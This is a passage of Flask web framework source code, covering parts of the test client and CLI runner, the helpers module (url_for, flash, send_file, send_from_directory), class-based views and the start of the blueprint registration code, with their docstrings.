stored back. :: with client.session_transaction() as session: session['value'] = 42 Internally this is implemented by going through a temporary test request context and since session handling could depend on request variables this function accepts the same arguments as :meth:`~flask.Flask.test_request_context` which are directly passed through. """ if self._cookies is None: raise TypeError( "Cookies are disabled. Create a client with 'use_cookies=True'." ) app = self.application ctx = app.test_request_context(*args, **kwargs) self._add_cookies_to_wsgi(ctx.request.environ) with ctx: sess = app.session_interface.open_session(app, ctx.request) if sess is None: raise RuntimeError("Session backend did not open a session.") yield sess resp = app.response_class() if app.session_interface.is_null_session(sess): return with ctx: app.session_interface.save_session(app, sess, resp) self._update_cookies_from_response( ctx.request.host.partition(":")[0], ctx.request.path, resp.headers.getlist("Set-Cookie"), ) def _copy_environ(self, other: WSGIEnvironment) -> WSGIEnvironment: out = {**self.environ_base, **other} if self.preserve_context: out["werkzeug.debug.preserve_context"] = self._new_contexts.append return out def _request_from_builder_args( self, args: tuple[t.Any, ...], kwargs: dict[str, t.Any] ) -> BaseRequest: kwargs["environ_base"] = self._copy_environ(kwargs.get("environ_base", {})) builder = EnvironBuilder(self.application, *args, **kwargs) try: return builder.get_request() finally: builder.close() def open( self, *args: t.Any, buffered: bool = False, follow_redirects: bool = False, **kwargs: t.Any, ) -> TestResponse: if args and isinstance( args[0], (werkzeug.test.EnvironBuilder, dict, BaseRequest) ): if isinstance(args[0], werkzeug.test.EnvironBuilder): builder = copy(args[0]) builder.environ_base = self._copy_environ(builder.environ_base or {}) # type: ignore[arg-type] request = builder.get_request() elif isinstance(args[0], dict): request = EnvironBuilder.from_environ( args[0], app=self.application, environ_base=self._copy_environ({}) ).get_request() else: # isinstance(args[0], BaseRequest) request = copy(args[0]) request.environ = self._copy_environ(request.environ) else: # request is None request = self._request_from_builder_args(args, kwargs) # Pop any previously preserved contexts. This prevents contexts # from being preserved across redirects or multiple requests # within a single block. self._context_stack.close() response = super().open( request, buffered=buffered, follow_redirects=follow_redirects, ) response.json_module = self.application.json # type: ignore[assignment] # Re-push contexts that were preserved during the request. while self._new_contexts: cm = self._new_contexts.pop() self._context_stack.enter_context(cm) return response def __enter__(self) -> FlaskClient: if self.preserve_context: raise RuntimeError("Cannot nest client invocations") self.preserve_context = True return self def __exit__( self, exc_type: type | None, exc_value: BaseException | None, tb: TracebackType | None, ) -> None: self.preserve_context = False self._context_stack.close() class FlaskCliRunner(CliRunner): """A :class:`~click.testing.CliRunner` for testing a Flask app's CLI commands. Typically created using :meth:`~flask.Flask.test_cli_runner`. See :ref:`testing-cli`. """ def __init__(self, app: Flask, **kwargs: t.Any) -> None: self.app = app super().__init__(**kwargs) def invoke( # type: ignore self, cli: t.Any = None, args: t.Any = None, **kwargs: t.Any ) -> t.Any: """Invokes a CLI command in an isolated environment. See :meth:`CliRunner.invoke <click.testing.CliRunner.invoke>` for full method documentation. See :ref:`testing-cli` for examples. If the ``obj`` argument is not given, passes an instance of :class:`~flask.cli.ScriptInfo` that knows how to load the Flask app being tested. :param cli: Command object to invoke. Default is the app's :attr:`~flask.app.Flask.cli` group. :param args: List of strings to invoke the command with. :return: a :class:`~click.testing.Result` object. """ if cli is None: cli = self.app.cli if "obj" not in kwargs: kwargs["obj"] = ScriptInfo(create_app=lambda: self.app) return super().invoke(cli, args, **kwargs) File: src/flask/helpers.py from __future__ import annotations import importlib.util import os import sys import typing as t from datetime import datetime from functools import lru_cache from functools import update_wrapper import werkzeug.utils from werkzeug.exceptions import abort as _wz_abort from werkzeug.utils import redirect as _wz_redirect from werkzeug.wrappers import Response as BaseResponse from .globals import _cv_request from .globals import current_app from .globals import request from .globals import request_ctx from .globals import session from .signals import message_flashed if t.TYPE_CHECKING: # pragma: no cover from .wrappers import Response def get_debug_flag() -> bool: """Get whether debug mode should be enabled for the app, indicated by the :envvar:`FLASK_DEBUG` environment variable. The default is ``False``. """ val = os.environ.get("FLASK_DEBUG") return bool(val and val.lower() not in {"0", "false", "no"}) def get_load_dotenv(default: bool = True) -> bool: """Get whether the user has disabled loading default dotenv files by setting :envvar:`FLASK_SKIP_DOTENV`. The default is ``True``, load the files. :param default: What to return if the env var isn't set. """ val = os.environ.get("FLASK_SKIP_DOTENV") if not val: return default return val.lower() in ("0", "false", "no") @t.overload def stream_with_context( generator_or_function: t.Iterator[t.AnyStr], ) -> t.Iterator[t.AnyStr]: ... @t.overload def stream_with_context( generator_or_function: t.Callable[..., t.Iterator[t.AnyStr]], ) -> t.Callable[[t.Iterator[t.AnyStr]], t.Iterator[t.AnyStr]]: ... def stream_with_context( generator_or_function: t.Iterator[t.AnyStr] | t.Callable[..., t.Iterator[t.AnyStr]], ) -> t.Iterator[t.AnyStr] | t.Callable[[t.Iterator[t.AnyStr]], t.Iterator[t.AnyStr]]: """Request contexts disappear when the response is started on the server. This is done for efficiency reasons and to make it less likely to encounter memory leaks with badly written WSGI middlewares. The downside is that if you are using streamed responses, the generator cannot access request bound information any more. This function however can help you keep the context around for longer:: from flask import stream_with_context, request, Response @app.route('/stream') def streamed_response(): @stream_with_context def generate(): yield 'Hello ' yield request.args['name'] yield '!' return Response(generate()) Alternatively it can also be used around a specific generator:: from flask import stream_with_context, request, Response @app.route('/stream') def streamed_response(): def generate(): yield 'Hello ' yield request.args['name'] yield '!' return Response(stream_with_context(generate())) .. versionadded:: 0.9 """ try: gen = iter(generator_or_function) # type: ignore[arg-type] except TypeError: def decorator(*args: t.Any, **kwargs: t.Any) -> t.Any: gen = generator_or_function(*args, **kwargs) # type: ignore[operator] return stream_with_context(gen) return update_wrapper(decorator, generator_or_function) # type: ignore[arg-type, return-value] def generator() -> t.Iterator[t.AnyStr | None]: ctx = _cv_request.get(None) if ctx is None: raise RuntimeError( "'stream_with_context' can only be used when a request" " context is active, such as in a view function." ) with ctx: # Dummy sentinel. Has to be inside the context block or we're # not actually keeping the context around. yield None # The try/finally is here so that if someone passes a WSGI level # iterator in we're still running the cleanup logic. Generators # don't need that because they are closed on their destruction # automatically. try: yield from gen finally: if hasattr(gen, "close"): gen.close() # The trick is to start the generator. Then the code execution runs until # the first dummy None is yielded at which point the context was already # pushed. This item is discarded. Then when the iteration continues the # real generator is executed. wrapped_g = generator() next(wrapped_g) return wrapped_g # type: ignore[return-value] def make_response(*args: t.Any) -> Response: """Sometimes it is necessary to set additional headers in a view. Because views do not have to return response objects but can return a value that is converted into a response object by Flask itself, it becomes tricky to add headers to it. This function can be called instead of using a return and you will get a response object which you can use to attach headers. If view looked like this and you want to add a new header:: def index(): return render_template('index.html', foo=42) You can now do something like this:: def index(): response = make_response(render_template('index.html', foo=42)) response.headers['X-Parachutes'] = 'parachutes are cool' return response This function accepts the very same arguments you can return from a view function. This for example creates a response with a 404 error code:: response = make_response(render_template('not_found.html'), 404) The other use case of this function is to force the return value of a view function into a response which is helpful with view decorators:: response = make_response(view_function()) response.headers['X-Parachutes'] = 'parachutes are cool' Internally this function does the following things: - if no arguments are passed, it creates a new response argument - if one argument is passed, :meth:`flask.Flask.make_response` is invoked with it. - if more than one argument is passed, the arguments are passed to the :meth:`flask.Flask.make_response` function as tuple. .. versionadded:: 0.6 """ if not args: return current_app.response_class() if len(args) == 1: args = args[0] return current_app.make_response(args) def url_for( endpoint: str, *, _anchor: str | None = None, _method: str | None = None, _scheme: str | None = None, _external: bool | None = None, **values: t.Any, ) -> str: """Generate a URL to the given endpoint with the given values. This requires an active request or application context, and calls :meth:`current_app.url_for() <flask.Flask.url_for>`. See that method for full documentation. :param endpoint: The endpoint name associated with the URL to generate. If this starts with a ``.``, the current blueprint name (if any) will be used. :param _anchor: If given, append this as ``#anchor`` to the URL. :param _method: If given, generate the URL associated with this method for the endpoint. :param _scheme: If given, the URL will have this scheme if it is external. :param _external: If given, prefer the URL to be internal (False) or require it to be external (True). External URLs include the scheme and domain. When not in an active request, URLs are external by default. :param values: Values to use for the variable parts of the URL rule. Unknown keys are appended as query string arguments, like ``?a=b&c=d``. .. versionchanged:: 2.2 Calls ``current_app.url_for``, allowing an app to override the behavior. .. versionchanged:: 0.10 The ``_scheme`` parameter was added. .. versionchanged:: 0.9 The ``_anchor`` and ``_method`` parameters were added. .. versionchanged:: 0.9 Calls ``app.handle_url_build_error`` on build errors. """ return current_app.url_for( endpoint, _anchor=_anchor, _method=_method, _scheme=_scheme, _external=_external, **values, ) def redirect( location: str, code: int = 302, Response: type[BaseResponse] | None = None ) -> BaseResponse: """Create a redirect response object. If :data:`~flask.current_app` is available, it will use its :meth:`~flask.Flask.redirect` method, otherwise it will use :func:`werkzeug.utils.redirect`. :param location: The URL to redirect to. :param code: The status code for the redirect. :param Response: The response class to use. Not used when ``current_app`` is active, which uses ``app.response_class``. .. versionadded:: 2.2 Calls ``current_app.redirect`` if available instead of always using Werkzeug's default ``redirect``. """ if current_app: return current_app.redirect(location, code=code) return _wz_redirect(location, code=code, Response=Response) def abort(code: int | BaseResponse, *args: t.Any, **kwargs: t.Any) -> t.NoReturn: """Raise an :exc:`~werkzeug.exceptions.HTTPException` for the given status code. If :data:`~flask.current_app` is available, it will call its :attr:`~flask.Flask.aborter` object, otherwise it will use :func:`werkzeug.exceptions.abort`. :param code: The status code for the exception, which must be registered in ``app.aborter``. :param args: Passed to the exception. :param kwargs: Passed to the exception. .. versionadded:: 2.2 Calls ``current_app.aborter`` if available instead of always using Werkzeug's default ``abort``. """ if current_app: current_app.aborter(code, *args, **kwargs) _wz_abort(code, *args, **kwargs) def get_template_attribute(template_name: str, attribute: str) -> t.Any: """Loads a macro (or variable) a template exports. This can be used to invoke a macro from within Python code. If you for example have a template named :file:`_cider.html` with the following contents: .. sourcecode:: html+jinja {% macro hello(name) %}Hello {{ name }}!{% endmacro %} You can access this from Python code like this:: hello = get_template_attribute('_cider.html', 'hello') return hello('World') .. versionadded:: 0.2 :param template_name: the name of the template :param attribute: the name of the variable of macro to access """ return getattr(current_app.jinja_env.get_template(template_name).module, attribute) def flash(message: str, category: str = "message") -> None: """Flashes a message to the next request. In order to remove the flashed message from the session and to display it to the user, the template has to call :func:`get_flashed_messages`. .. versionchanged:: 0.3 `category` parameter added. :param message: the message to be flashed. :param category: the category for the message. The following values are recommended: ``'message'`` for any kind of message, ``'error'`` for errors, ``'info'`` for information messages and ``'warning'`` for warnings. However any kind of string can be used as category. """ # Original implementation: # # session.setdefault('_flashes', []).append((category, message)) # # This assumed that changes made to mutable structures in the session are # always in sync with the session object, which is not true for session # implementations that use external storage for keeping their keys/values. flashes = session.get("_flashes", []) flashes.append((category, message)) session["_flashes"] = flashes app = current_app._get_current_object() # type: ignore message_flashed.send( app, _async_wrapper=app.ensure_sync, message=message, category=category, ) def get_flashed_messages( with_categories: bool = False, category_filter: t.Iterable[str] = () ) -> list[str] | list[tuple[str, str]]: """Pulls all flashed messages from the session and returns them. Further calls in the same request to the function will return the same messages. By default just the messages are returned, but when `with_categories` is set to ``True``, the return value will be a list of tuples in the form ``(category, message)`` instead. Filter the flashed messages to one or more categories by providing those categories in `category_filter`. This allows rendering categories in separate html blocks. The `with_categories` and `category_filter` arguments are distinct: * `with_categories` controls whether categories are returned with message text (``True`` gives a tuple, where ``False`` gives just the message text). * `category_filter` filters the messages down to only those matching the provided categories. See :doc:`/patterns/flashing` for examples. .. versionchanged:: 0.3 `with_categories` parameter added. .. versionchanged:: 0.9 `category_filter` parameter added. :param with_categories: set to ``True`` to also receive categories. :param category_filter: filter of categories to limit return values. Only categories in the list will be returned. """ flashes = request_ctx.flashes if flashes is None: flashes = session.pop("_flashes") if "_flashes" in session else [] request_ctx.flashes = flashes if category_filter: flashes = list(filter(lambda f: f[0] in category_filter, flashes)) if not with_categories: return [x[1] for x in flashes] return flashes def _prepare_send_file_kwargs(**kwargs: t.Any) -> dict[str, t.Any]: if kwargs.get("max_age") is None: kwargs["max_age"] = current_app.get_send_file_max_age kwargs.update( environ=request.environ, use_x_sendfile=current_app.config["USE_X_SENDFILE"], response_class=current_app.response_class, _root_path=current_app.root_path, # type: ignore ) return kwargs def send_file( path_or_file: os.PathLike[t.AnyStr] | str | t.BinaryIO, mimetype: str | None = None, as_attachment: bool = False, download_name: str | None = None, conditional: bool = True, etag: bool | str = True, last_modified: datetime | int | float | None = None, max_age: None | (int | t.Callable[[str | None], int | None]) = None, ) -> Response: """Send the contents of a file to the client. The first argument can be a file path or a file-like object. Paths are preferred in most cases because Werkzeug can manage the file and get extra information from the path. Passing a file-like object requires that the file is opened in binary mode, and is mostly useful when building a file in memory with :class:`io.BytesIO`. Never pass file paths provided by a user. The path is assumed to be trusted, so a user could craft a path to access a file you didn't intend. Use :func:`send_from_directory` to safely serve user-requested paths from within a directory. If the WSGI server sets a ``file_wrapper`` in ``environ``, it is used, otherwise Werkzeug's built-in wrapper is used. Alternatively, if the HTTP server supports ``X-Sendfile``, configuring Flask with ``USE_X_SENDFILE = True`` will tell the server to send the given path, which is much more efficient than reading it in Python. :param path_or_file: The path to the file to send, relative to the current working directory if a relative path is given. Alternatively, a file-like object opened in binary mode. Make sure the file pointer is seeked to the start of the data. :param mimetype: The MIME type to send for the file. If not provided, it will try to detect it from the file name. :param as_attachment: Indicate to a browser that it should offer to save the file instead of displaying it. :param download_name: The default name browsers will use when saving the file. Defaults to the passed file name. :param conditional: Enable conditional and range responses based on request headers. Requires passing a file path and ``environ``. :param etag: Calculate an ETag for the file, which requires passing a file path. Can also be a string to use instead. :param last_modified: The last modified time to send for the file, in seconds. If not provided, it will try to detect it from the file path. :param max_age: How long the client should cache the file, in seconds. If set, ``Cache-Control`` will be ``public``, otherwise it will be ``no-cache`` to prefer conditional caching. .. versionchanged:: 2.0 ``download_name`` replaces the ``attachment_filename`` parameter. If ``as_attachment=False``, it is passed with ``Content-Disposition: inline`` instead. .. versionchanged:: 2.0 ``max_age`` replaces the ``cache_timeout`` parameter. ``conditional`` is enabled and ``max_age`` is not set by default. .. versionchanged:: 2.0 ``etag`` replaces the ``add_etags`` parameter. It can be a string to use instead of generating one. .. versionchanged:: 2.0 Passing a file-like object that inherits from :class:`~io.TextIOBase` will raise a :exc:`ValueError` rather than sending an empty file. .. versionadded:: 2.0 Moved the implementation to Werkzeug. This is now a wrapper to pass some Flask-specific arguments. .. versionchanged:: 1.1 ``filename`` may be a :class:`~os.PathLike` object. .. versionchanged:: 1.1 Passing a :class:`~io.BytesIO` object supports range requests. .. versionchanged:: 1.0.3 Filenames are encoded with ASCII instead of Latin-1 for broader compatibility with WSGI servers. .. versionchanged:: 1.0 UTF-8 filenames as specified in :rfc:`2231` are supported. .. versionchanged:: 0.12 The filename is no longer automatically inferred from file objects. If you want to use automatic MIME and etag support, pass a filename via ``filename_or_fp`` or ``attachment_filename``. .. versionchanged:: 0.12 ``attachment_filename`` is preferred over ``filename`` for MIME detection. .. versionchanged:: 0.9 ``cache_timeout`` defaults to :meth:`Flask.get_send_file_max_age`. .. versionchanged:: 0.7 MIME guessing and etag support for file-like objects was removed because it was unreliable. Pass a filename if you are able to, otherwise attach an etag yourself. .. versionchanged:: 0.5 The ``add_etags``, ``cache_timeout`` and ``conditional`` parameters were added. The default behavior is to add etags. .. versionadded:: 0.2 """ return werkzeug.utils.send_file( # type: ignore[return-value] **_prepare_send_file_kwargs( path_or_file=path_or_file, environ=request.environ, mimetype=mimetype, as_attachment=as_attachment, download_name=download_name, conditional=conditional, etag=etag, last_modified=last_modified, max_age=max_age, ) ) def send_from_directory( directory: os.PathLike[str] | str, path: os.PathLike[str] | str, **kwargs: t.Any, ) -> Response: """Send a file from within a directory using :func:`send_file`. .. code-block:: python @app.route("/uploads/<path:name>") def download_file(name): return send_from_directory( app.config['UPLOAD_FOLDER'], name, as_attachment=True ) This is a secure way to serve files from a folder, such as static files or uploads. Uses :func:`~werkzeug.security.safe_join` to ensure the path coming from the client is not maliciously crafted to point outside the specified directory. If the final path does not point to an existing regular file, raises a 404 :exc:`~werkzeug.exceptions.NotFound` error. :param directory: The directory that ``path`` must be located under, relative to the current application's root path. :param path: The path to the file to send, relative to ``directory``. :param kwargs: Arguments to pass to :func:`send_file`. .. versionchanged:: 2.0 ``path`` replaces the ``filename`` parameter. .. versionadded:: 2.0 Moved the implementation to Werkzeug. This is now a wrapper to pass some Flask-specific arguments. .. versionadded:: 0.5 """ return werkzeug.utils.send_from_directory( # type: ignore[return-value] directory, path, **_prepare_send_file_kwargs(**kwargs) ) def get_root_path(import_name: str) -> str: """Find the root path of a package, or the path that contains a module. If it cannot be found, returns the current working directory. Not to be confused with the value returned by :func:`find_package`. :meta private: """ # Module already imported and has a file attribute. Use that first. mod = sys.modules.get(import_name) if mod is not None and hasattr(mod, "__file__") and mod.__file__ is not None: return os.path.dirname(os.path.abspath(mod.__file__)) # Next attempt: check the loader. try: spec = importlib.util.find_spec(import_name) if spec is None: raise ValueError except (ImportError, ValueError): loader = None else: loader = spec.loader # Loader does not exist or we're referring to an unloaded main # module or a main module without path (interactive sessions), go # with the current working directory. if loader is None: return os.getcwd() if hasattr(loader, "get_filename"): filepath = loader.get_filename(import_name) else: # Fall back to imports. __import__(import_name) mod = sys.modules[import_name] filepath = getattr(mod, "__file__", None) # If we don't have a file path it might be because it is a # namespace package. In this case pick the root path from the # first module that is contained in the package. if filepath is None: raise RuntimeError( "No root path can be found for the provided module" f" {import_name!r}. This can happen because the module" " came from an import hook that does not provide file" " name information or because it's a namespace package." " In this case the root path needs to be explicitly" " provided." ) # filepath is import_name.py for a module, or __init__.py for a package. return os.path.dirname(os.path.abspath(filepath)) # type: ignore[no-any-return] @lru_cache(maxsize=None) def _split_blueprint_path(name: str) -> list[str]: out: list[str] = [name] if "." in name: out.extend(_split_blueprint_path(name.rpartition(".")[0])) return out File: src/flask/__main__.py from .cli import main main() File: src/flask/views.py from __future__ import annotations import typing as t from . import typing as ft from .globals import current_app from .globals import request F = t.TypeVar("F", bound=t.Callable[..., t.Any]) http_method_funcs = frozenset( ["get", "post", "head", "options", "delete", "put", "trace", "patch"] ) class View: """Subclass this class and override :meth:`dispatch_request` to create a generic class-based view. Call :meth:`as_view` to create a view function that creates an instance of the class with the given arguments and calls its ``dispatch_request`` method with any URL variables. See :doc:`views` for a detailed guide. .. code-block:: python class Hello(View): init_every_request = False def dispatch_request(self, name): return f"Hello, {name}!" app.add_url_rule( "/hello/<name>", view_func=Hello.as_view("hello") ) Set :attr:`methods` on the class to change what methods the view accepts. Set :attr:`decorators` on the class to apply a list of decorators to the generated view function. Decorators applied to the class itself will not be applied to the generated view function! Set :attr:`init_every_request` to ``False`` for efficiency, unless you need to store request-global data on ``self``. """ #: The methods this view is registered for. Uses the same default #: (``["GET", "HEAD", "OPTIONS"]``) as ``route`` and #: ``add_url_rule`` by default. methods: t.ClassVar[t.Collection[str] | None] = None #: Control whether the ``OPTIONS`` method is handled automatically. #: Uses the same default (``True``) as ``route`` and #: ``add_url_rule`` by default. provide_automatic_options: t.ClassVar[bool | None] = None #: A list of decorators to apply, in order, to the generated view #: function. Remember that ``@decorator`` syntax is applied bottom #: to top, so the first decorator in the list would be the bottom #: decorator. #: #: .. versionadded:: 0.8 decorators: t.ClassVar[list[t.Callable[[F], F]]] = [] #: Create a new instance of this view class for every request by #: default. If a view subclass sets this to ``False``, the same #: instance is used for every request. #: #: A single instance is more efficient, especially if complex setup #: is done during init. However, storing data on ``self`` is no #: longer safe across requests, and :data:`~flask.g` should be used #: instead. #: #: .. versionadded:: 2.2 init_every_request: t.ClassVar[bool] = True def dispatch_request(self) -> ft.ResponseReturnValue: """The actual view function behavior. Subclasses must override this and return a valid response. Any variables from the URL rule are passed as keyword arguments. """ raise NotImplementedError() @classmethod def as_view( cls, name: str, *class_args: t.Any, **class_kwargs: t.Any ) -> ft.RouteCallable: """Convert the class into a view function that can be registered for a route. By default, the generated view will create a new instance of the view class for every request and call its :meth:`dispatch_request` method. If the view class sets :attr:`init_every_request` to ``False``, the same instance will be used for every request. Except for ``name``, all other arguments passed to this method are forwarded to the view class ``__init__`` method. .. versionchanged:: 2.2 Added the ``init_every_request`` class attribute. """ if cls.init_every_request: def view(**kwargs: t.Any) -> ft.ResponseReturnValue: self = view.view_class( # type: ignore[attr-defined] *class_args, **class_kwargs ) return current_app.ensure_sync(self.dispatch_request)(**kwargs) # type: ignore[no-any-return] else: self = cls(*class_args, **class_kwargs) def view(**kwargs: t.Any) -> ft.ResponseReturnValue: return current_app.ensure_sync(self.dispatch_request)(**kwargs) # type: ignore[no-any-return] if cls.decorators: view.__name__ = name view.__module__ = cls.__module__ for decorator in cls.decorators: view = decorator(view) # We attach the view class to the view function for two reasons: # first of all it allows us to easily figure out what class-based # view this thing came from, secondly it's also used for instantiating # the view class so you can actually replace it with something else # for testing purposes and debugging. view.view_class = cls # type: ignore view.__name__ = name view.__doc__ = cls.__doc__ view.__module__ = cls.__module__ view.methods = cls.methods # type: ignore view.provide_automatic_options = cls.provide_automatic_options # type: ignore return view class MethodView(View): """Dispatches request methods to the corresponding instance methods. For example, if you implement a ``get`` method, it will be used to handle ``GET`` requests. This can be useful for defining a REST API. :attr:`methods` is automatically set based on the methods defined on the class. See :doc:`views` for a detailed guide. .. code-block:: python class CounterAPI(MethodView): def get(self): return str(session.get("counter", 0)) def post(self): session["counter"] = session.get("counter", 0) + 1 return redirect(url_for("counter")) app.add_url_rule( "/counter", view_func=CounterAPI.as_view("counter") ) """ def __init_subclass__(cls, **kwargs: t.Any) -> None: super().__init_subclass__(**kwargs) if "methods" not in cls.__dict__: methods = set() for base in cls.__bases__: if getattr(base, "methods", None): methods.update(base.methods) # type: ignore[attr-defined] for key in http_method_funcs: if hasattr(cls, key): methods.add(key.upper()) if methods: cls.methods = methods def dispatch_request(self, **kwargs: t.Any) -> ft.ResponseReturnValue: meth = getattr(self, request.method.lower(), None) # If the request method is HEAD and we don't have a handler for it # retry with GET. if meth is None and request.method == "HEAD": meth = getattr(self, "get", None) assert meth is not None, f"Unimplemented method {request.method!r}" return current_app.ensure_sync(meth)(**kwargs) # type: ignore[no-any-return] File: src/flask/sansio/blueprints.py from __future__ import annotations import os import typing as t from collections import defaultdict from functools import update_wrapper from .. import typing as ft from .scaffold import _endpoint_from_view_func from .scaffold import _sentinel from .scaffold import Scaffold from .scaffold import setupmethod if t.TYPE_CHECKING: # pragma: no cover from .app import App DeferredSetupFunction = t.Callable[["BlueprintSetupState"], None] T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable[t.Any]) T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable) T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable) T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) T_template_context_processor = t.TypeVar( "T_template_context_processor", bound=ft.TemplateContextProcessorCallable ) T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable) T_url_value_preprocessor = t.TypeVar( "T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable ) class BlueprintSetupState: """Temporary holder object for registering a blueprint with the application. An instance of this class is created by the :meth:`~flask.Blueprint.make_setup_state` method and later passed to all register callback functions. """ def __init__( self, blueprint: Blueprint, app: App, options: t.Any, first_registration: bool, ) -> None: #: a reference to the current application self.app = app #: a reference to the blueprint that created this setup state. self.blueprint = blueprint #: a dictionary with all options that were passed to the #: :meth:`~flask.Flask.register_blueprint` method. self.options = options #: as blueprints can be registered multiple times with the #: application and not everything wants to be registered #: multiple times on it, this attribute can be used to figure #: out if the blueprint was registered in the past already. self.first_registration = first_registration subdomain = self.options.get("subdomain") if subdomain is None: subdomain = self.blueprint.subdomain #: The subdomain that the blueprint should be active for, ``None`` #: otherwise. self.subdomain = subdomain url_prefix = self.options.get("url_prefix") if url_prefix is None: url_prefix = self.blueprint.url_prefix #: The prefix that should be used for all URLs defined on the #: blueprint. self.url_prefix = url_prefix self.name = self.options.get("name", blueprint.name) self.name_prefix = self.options.get("name_prefix", "") #: A dictionary with URL defaults that is added to each and every #: URL that was defined with the blueprint. self.url_defaults = dict(self.blueprint.url_values_defaults) self.url_defaults.update(self.options.get("url_defaults", ())) def add_url_rule( self, rule: str, endpoint: str | None = None, view_func: ft.RouteCallable | None = None, **options: t.Any, ) -> None: """A helper method to register a rule (and optionally a view function) to the application. The endpoint is automatically prefixed with the blueprint's name. """ if self.url_prefix is not None: if rule: rule = "/".join((self.url_prefix.rstrip("/"), rule.lstrip("/"))) else: rule = self.url_prefix options.setdefault("subdomain", self.subdomain) if endpoint is None: endpoint = _endpoint_from_view_func(view_func) # type: ignore defaults = self.url_defaults if "defaults" in options: defaults = dict(defaults, **options.pop("defaults")) self.app.add_url_rule( rule, f"{self.name_prefix}.{self.name}.{endpoint}".lstrip("."), view_func, defaults=defaults, **options, ) class Blueprint(Scaffold): """Represents a blueprint, a collection of routes and other app-related functions that can be registered on a real application later. A blueprint is an object that allows defining application functions without requiring an application object ahead of time. It uses the same decorators as :class:`~flask.Flask`, but defers the need for an application by recording them for later registration. Decorating a function with a blueprint creates a deferred function that is called with :class:`~flask.blueprints.BlueprintSetupState` when the blueprint is registered on an application. See :doc:`/blueprints` for more information. :param name: The name of the blueprint. Will be prepended to each endpoint name. :param import_name: The name of the blueprint package, usually ``__name__``. This helps locate the ``root_path`` for the blueprint. :param static_folder: A folder with static files that should be served by the blueprint's static route. The path is relative to the blueprint's root path. Blueprint static files are disabled by default. :param static_url_path: The url to serve static files from. Defaults to ``static_folder``. If the blueprint does not have a ``url_prefix``, the app's static route will take precedence, and the blueprint's static files won't be accessible. :param template_folder: A folder with templates that should be added to the app's template search path. The path is relative to the blueprint's root path. Blueprint templates are disabled by default. Blueprint templates have a lower precedence than those in the app's templates folder. :param url_prefix: A path to prepend to all of the blueprint's URLs, to make them distinct from the rest of the app's routes. :param subdomain: A subdomain that blueprint routes will match on by default. :param url_defaults: A dict of default values that blueprint routes will receive by default. :param root_path: By default, the blueprint will automatically set this based on ``import_name``. In certain situations this automatic detection can fail, so the path can be specified manually instead. .. versionchanged:: 1.1.0 Blueprints have a ``cli`` group to register nested CLI commands. The ``cli_group`` parameter controls the name of the group under the ``flask`` command. .. versionadded:: 0.7 """ _got_registered_once = False def __init__( self, name: str, import_name: str, static_folder: str | os.PathLike[str] | None = None, static_url_path: str | None = None, template_folder: str | os.PathLike[str] | None = None, url_prefix: str | None = None, subdomain: str | None = None, url_defaults: dict[str, t.Any] | None = None, root_path: str | None = None, cli_group: str | None = _sentinel, # type: ignore[assignment] ): super().__init__( import_name=import_name, static_folder=static_folder, static_url_path=static_url_path, template_folder=template_folder, root_path=root_path, ) if not name: raise ValueError("'name' may not be empty.") if "." in name: raise ValueError("'name' may not contain a dot '.' character.") self.name = name self.url_prefix = url_prefix self.subdomain = subdomain self.deferred_functions: list[DeferredSetupFunction] = [] if url_defaults is None: url_defaults = {} self.url_values_defaults = url_defaults self.cli_group = cli_group self._blueprints: list[tuple[Blueprint, dict[str, t.Any]]] = [] def _check_setup_finished(self, f_name: str) -> None: if self._got_registered_once: raise AssertionError( f"The setup method '{f_name}' can no longer be called on the blueprint" f" '{self.name}'. It has already been registered at least once, any" " changes will not be applied consistently.\n" "Make sure all imports, decorators, functions, etc. needed to set up" " the blueprint are done before registering it." ) @setupmethod def record(self, func: DeferredSetupFunction) -> None: """Registers a function that is called when the blueprint is registered on the application. This function is called with the state as argument as returned by the :meth:`make_setup_state` method. """ self.deferred_functions.append(func) @setupmethod def record_once(self, func: DeferredSetupFunction) -> None: """Works like :meth:`record` but wraps the function in another function that will ensure the function is only called once. If the blueprint is registered a second time on the application, the function passed is not called. """ def wrapper(state: BlueprintSetupState) -> None: if state.first_registration: func(state) self.record(update_wrapper(wrapper, func)) def make_setup_state( self, app: App, options: dict[str, t.Any], first_registration: bool = False ) -> BlueprintSetupState: """Creates an instance of :meth:`~flask.blueprints.BlueprintSetupState` object that is later passed to the register callback functions. Subclasses can override this to return a subclass of the setup state. """ return BlueprintSetupState(self, app, options, first_registration) @setupmethod def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None: """Register a :class:`~flask.Blueprint` on this blueprint. Keyword arguments passed to this method will override the defaults set on the blueprint. .. versionchanged:: 2.0.1 The ``name`` option can be used to change the (pre-dotted) name the blueprint is registered with. This allows the same blueprint to be registered multiple times with unique names for ``url_for``. .. versionadded:: 2.0 """ if blueprint is self: raise ValueError("Cannot register a blueprint on itself") self._blueprints.append((blueprint, options)) def register(self, app: App, options: dict[str, t.Any]) -> None: """Called by :meth:`Flask.register_blueprint` to register all views and callbacks registered on the blueprint with the application. Creates a :class:`.BlueprintSetupState` and calls each :meth:`record` callback with it. :param app: The application this blueprint is being registered with. :param options: Keyword arguments forwarded from :meth:`~Flask.register_blueprint`. .. versionchanged:: 2.3 Nested blueprints now correctly apply subdomains. .. versionchanged:: 2.1 Registering the same blueprint with the same name multiple times is an error. .. versionchanged:: 2.0.1 Nested blueprints are registered with their dotted name. This allows different blueprints with the same name to be nested at different locations. .. versionchanged:: 2.0.1 The ``name`` option can be used to change the (pre-dotted) name the blueprint is registered with. This allows the same blueprint to be registered multiple times with unique names for ``url_for``. """ name_prefix = options.get("name_prefix", "") self_name = options.get("name", self.name) name = f"{name_prefix}.{self_name}".lstrip(".") if name in app.blueprints: bp_desc = "this" if app.blueprints[name] is self else "a different" existing_at = f" '{name}'" if self_name != name else "" raise ValueError( f"The name '{self_name}' is already registered for" f" {bp_desc} blueprint{existing_at}. Use 'name=' to" f" provide a unique name." ) first_bp_registration = not any(bp is self for bp in app.blueprints.values()) first_name_registration = name not in app.blueprints app.blueprints[name] = self self._got_registered_once = True state = self.make_setup_state(app, 